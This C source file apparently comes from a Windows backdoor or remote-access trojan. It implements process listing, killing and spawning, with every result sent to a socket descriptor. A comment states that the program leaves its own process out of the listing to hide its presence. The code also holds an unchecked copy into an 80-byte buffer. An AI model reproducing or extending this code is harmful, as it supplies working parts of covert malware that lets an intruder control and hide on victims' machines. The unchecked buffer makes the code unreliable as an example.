#include "proc.h"
#include "sock.h"

/*
 * Return the process ID of the process with executable (or dll) described by
 * path.
 */
DWORD GetProcessID(char *path)
{
	HANDLE handle;
	PROCESSENTRY32 pentry;

	handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

	pentry.dwSize = sizeof(PROCESSENTRY32);

	if (!Process32First(handle, &pentry))
	{
		return 0;
	}
	else
	{
		do {
			if (_stricmp(pentry.szExeFile, path) == 0)
			{
				CloseHandle(handle);
				return pentry.th32ProcessID;
			}
		} while (Process32Next(handle, &pentry));
	}

	CloseHandle(handle);
	return 0;
}

/*
 * List all processes on the local machine to the descriptor fd.
 * Processes containing the substring PROG_NAME are not displayed
 * (this is done to hide the presence of this program).
 */
void ProcessList(int fd)
{
	HANDLE handle;
	DWORD currID;
	PROCESSENTRY32 pentry;
	char buf[120];

	handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	currID = GetCurrentProcessId();

	pentry.dwSize = sizeof(PROCESSENTRY32);

	if (!Process32First(handle, &pentry))
	{
		sendmesg(fd, "Error getting process list\r\n");
	}
	else
	{
		/* don't display the process ID of this program */
		if (pentry.th32ProcessID != currID)
		{
			sprintf(buf, "%-10lx %s\r\n", pentry.th32ProcessID, pentry.szExeFile);
			sendmesg(fd, buf);
		}

		while (Process32Next(handle, &pentry))
		{
			if (pentry.th32ProcessID != currID)
			{
				sprintf(buf, "%-10lx %s\r\n", pentry.th32ProcessID, pentry.szExeFile);
				sendmesg(fd, buf);
			}
		}
	}

	CloseHandle(handle);
}

/*
 * Kill the process stored in proc (in string format, as a
 * hexadecimal number).
 * There can be whitespace before and after the process ID.
 */
void KillProcess(int fd, char *proc)
{
	DWORD pid;
	HANDLE handle;

	/* convert the string proc to an integer value */
	sscanf(proc, "%lx", &pid);
	
	handle = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pid);
	if (handle == NULL)
	{
		sendmesg(fd, "Could not open process\r\n");
	}
	else
	{
		TerminateProcess(handle, 0);
	}

	CloseHandle(handle);
}

/*
 * Spawn a new process described by proc.
 */
void SpawnProcess(int fd, char *proc)
{
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	char startDir[80];
	char *startDirPtr = NULL;
	int i;

	GetStartupInfo(&si);

	/* strip whitespace */
	while (*proc == ' ')
		proc++;

	for (i = strlen(proc); i >= 0; i--)
	{
		if (proc[i] == '\\')
		{
			strncpy(startDir, proc, i);
			startDir[i] = '\0';
			startDirPtr = startDir;
			break;
		}
	}

	if (!CreateProcess(NULL, proc, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS,
		NULL, startDirPtr, &si, &pi))
	{
		sendmesg(fd, "Could not create process\r\n");
	}
}
